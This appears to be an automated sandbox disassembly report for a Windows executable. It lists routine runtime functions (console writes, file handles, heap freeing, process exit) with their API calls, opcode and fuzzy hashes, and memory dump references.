                                                                                                                                                                                                                                              • Instruction ID: b448f9862ad4b2578966b4992cc4363d812fab8a517ea80ecd4279cba33f4c89
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE212D72A0CB8295F650AB14E5156EA6361FF88784F444036EB4DD37E6DF3CE9458780
                                                                                                                                                                                                                                              Function 00007FF6B751CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 965 7ff6b751cf60-7ff6b751cf85 966 7ff6b751cf8b-7ff6b751cf8e 965->966 967 7ff6b751d253 965->967 968 7ff6b751cfc7-7ff6b751cff3 966->968 969 7ff6b751cf90-7ff6b751cfc2 call 7ff6b751a814 966->969 970 7ff6b751d255-7ff6b751d265 967->970 972 7ff6b751cffe-7ff6b751d004 968->972 973 7ff6b751cff5-7ff6b751cffc 968->973 969->970 975 7ff6b751d006-7ff6b751d00f call 7ff6b751c320 972->975 976 7ff6b751d014-7ff6b751d029 call 7ff6b752391c 972->976 973->969 973->972 975->976 980 7ff6b751d02f-7ff6b751d038 976->980 981 7ff6b751d143-7ff6b751d14c 976->981 980->981 984 7ff6b751d03e-7ff6b751d042 980->984 982 7ff6b751d14e-7ff6b751d154 981->982 983 7ff6b751d1a0-7ff6b751d1c5 WriteFile 981->983 987 7ff6b751d156-7ff6b751d159 982->987 988 7ff6b751d18c-7ff6b751d19e call 7ff6b751ca18 982->988 985 7ff6b751d1c7-7ff6b751d1cd GetLastError 983->985 986 7ff6b751d1d0 983->986 989 7ff6b751d053-7ff6b751d05e 984->989 990 7ff6b751d044-7ff6b751d04c call 7ff6b75147c0 984->990 985->986 994 7ff6b751d1d3 986->994 995 7ff6b751d178-7ff6b751d18a call 7ff6b751cc38 987->995 996 7ff6b751d15b-7ff6b751d15e 987->996 1009 7ff6b751d130-7ff6b751d137 988->1009 991 7ff6b751d06f-7ff6b751d084 GetConsoleMode 989->991 992 7ff6b751d060-7ff6b751d069 989->992 990->989 1000 7ff6b751d08a-7ff6b751d090 991->1000 1001 7ff6b751d13c 991->1001 992->981 992->991 1003 7ff6b751d1d8 994->1003 995->1009 1004 7ff6b751d1e4-7ff6b751d1ee 996->1004 1005 7ff6b751d164-7ff6b751d176 call 7ff6b751cb1c 996->1005 1007 7ff6b751d096-7ff6b751d099 1000->1007 1008 7ff6b751d119-7ff6b751d12b call 7ff6b751c5a0 1000->1008 1001->981 1010 7ff6b751d1dd 1003->1010 1011 7ff6b751d24c-7ff6b751d251 1004->1011 1012 7ff6b751d1f0-7ff6b751d1f5 1004->1012 1005->1009 1014 7ff6b751d09b-7ff6b751d09e 1007->1014 1015 7ff6b751d0a4-7ff6b751d0b2 1007->1015 1008->1009 1009->1003 1010->1004 1011->970 1017 7ff6b751d1f7-7ff6b751d1fa 1012->1017 1018 7ff6b751d223-7ff6b751d22d 1012->1018 1014->1010 1014->1015 1022 7ff6b751d110-7ff6b751d114 1015->1022 1023 7ff6b751d0b4 1015->1023 1024 7ff6b751d1fc-7ff6b751d20b 1017->1024 1025 7ff6b751d213-7ff6b751d21e call 7ff6b7514ec4 1017->1025 1020 7ff6b751d22f-7ff6b751d232 1018->1020 1021 7ff6b751d234-7ff6b751d243 1018->1021 1020->967 1020->1021 1021->1011 1022->994 1027 7ff6b751d0b8-7ff6b751d0cf call 7ff6b75239e8 1023->1027 1024->1025 1025->1018 1031 7ff6b751d107-7ff6b751d10d GetLastError 1027->1031 1032 7ff6b751d0d1-7ff6b751d0dd 1027->1032 1031->1022 1033 7ff6b751d0fc-7ff6b751d103 1032->1033 1034 7ff6b751d0df-7ff6b751d0f1 call 7ff6b75239e8 1032->1034 1033->1022 1035 7ff6b751d105 1033->1035 1034->1031 1038 7ff6b751d0f3-7ff6b751d0fa 1034->1038 1035->1027 1038->1033
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D07C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B751CF4B), ref: 00007FF6B751D107
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                              • Instruction ID: 6d89d0196e781cbe9b536f63fc846c5fa44fd028449234b695db76210944b5d4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1191ADB3E1C76285F7609F6D94406BD2BA0AB44B89F544139DF0EA7EA4DF39E482D700
                                                                                                                                                                                                                                              Function 00007FF6B7515628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1279662727-0
                                                                                                                                                                                                                                              • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                              • Instruction ID: 0bb9fd529e0937b88cd4e6ffa7f4e000f86cc17932332b5b5c4e2bc2f5ff710c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27418023E1C79283E7509F6495503696260FB947A5F109335EBAC83EE2EF7CA5E08740
                                                                                                                                                                                                                                              Function 00007FF6B750CC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3251591375-0
                                                                                                                                                                                                                                              • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                              • Instruction ID: c5f8044358c9d798c5894b463f45aa4f97b247633c3543ef5eb62a9e4030bf9b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77313A23E0C29745FA54AB6C94623F91791AF82388F44503AEB4ECB6F7DE2DB8059241
                                                                                                                                                                                                                                              Function 00007FF6B7519A30 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                                              • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                              • Instruction ID: 70e9a4f3ccd27b92af4afb585e400eb988e2a440b0c63785d9bcac6133a6a011
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7D09E12F0C79642FB142F785C5517812666F58B02F14143CDA8B867B3EE2CB84D8340
                                                                                                                                                                                                                                              Function 00007FF6B751013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                              • Instruction ID: 9e601518f5a6b0b002dad5668a8733424aa08585c56ca06e0a9f930c2eb9cb6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F510723B0D26586FB289F2D980167A6291BF44BA5F194735DF7D83BE5DF3CE4018620
                                                                                                                                                                                                                                              Function 00007FF6B751C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                                              • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                              • Instruction ID: 9348fd7082fa0307d0cc518e5fe57c94b1d6325e0784e436dff23ff2b4a4699b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8211C463A0CAA181DA208B2AE8141696361AB45FF4F544335EF7D8BBF9DE7CE0518740
                                                                                                                                                                                                                                              Function 00007FF6B751A948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                                              • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                              • Instruction ID: 3613575286240467edad9f89c37e75a443f63643d04c36f8c43fe361a08c654f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6E08C52F0D20643FF0A6FFAA8455381261AF88B02F444038CB0DC27B1EE2C78828710
                                                                                                                                                                                                                                              Function 00007FF6B751AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,?,00007FF6B751A9D5,?,?,00000000,00007FF6B751AA8A), ref: 00007FF6B751ABC6
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6B751A9D5,?,?,00000000,00007FF6B751AA8A), ref: 00007FF6B751ABD0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 918212764-0
                                                                                                                                                                                                                                              • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                              • Instruction ID: 407f86b3c7839f6f1954c1288e880ec10a226cb763a7050fad2a332fc2f14047
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7421AB13F1C6E241FA669BA9949037D12929F847A5F044239DB1EC7FF5DE6CF8814300
                                                                                                                                                                                                                                              Function 00007FF6B751BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                              • Instruction ID: 6c5d8e89f1f6e1cb93ead1f22dc2cae22c4fa37c2040123e0360d7510bde1ba4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C419A3391C25587EA259F2DA54027973A1EB5AB92F100235EBCEC3AE1CF6CE4438B51
                                                                                                                                                                                                                                              Function 00007FF6B7507F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                                                                                                              • Opcode ID: 0452e3aa7aca29920b4941156e71ee71ec49b143be23cefe434c899149b2eae9
                                                                                                                                                                                                                                              • Instruction ID: 37860710e2ad52b969d1663f6b44e6b6ee08945183f3051cc32d536a3ba7d339
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0452e3aa7aca29920b4941156e71ee71ec49b143be23cefe434c899149b2eae9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2421D622B1C66146FA109B2A6914BFA9781BF45BD8F884430EF4C97B96CE7DF042C300
                                                                                                                                                                                                                                              Function 00007FF6B751B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                                              • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                              • Instruction ID: 1e28fe687b4b102906b4916518218b98f1f38c22012c395fdba5b578c0066d66
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF316123A1C62285F7116F5D884137C26A0AF80FA6F415235EB5D97BF2CE7CF4428711
                                                                                                                                                                                                                                              Function 00007FF6B7519961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2126958891.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2126929997.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127002983.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127044872.00007FF6B7542000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2127112018.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                                              • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                              • Instruction ID: a68db4340b1205cab7b89a5b056d592e21b74a6ffdba87d9efdedfeabd7a09f1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
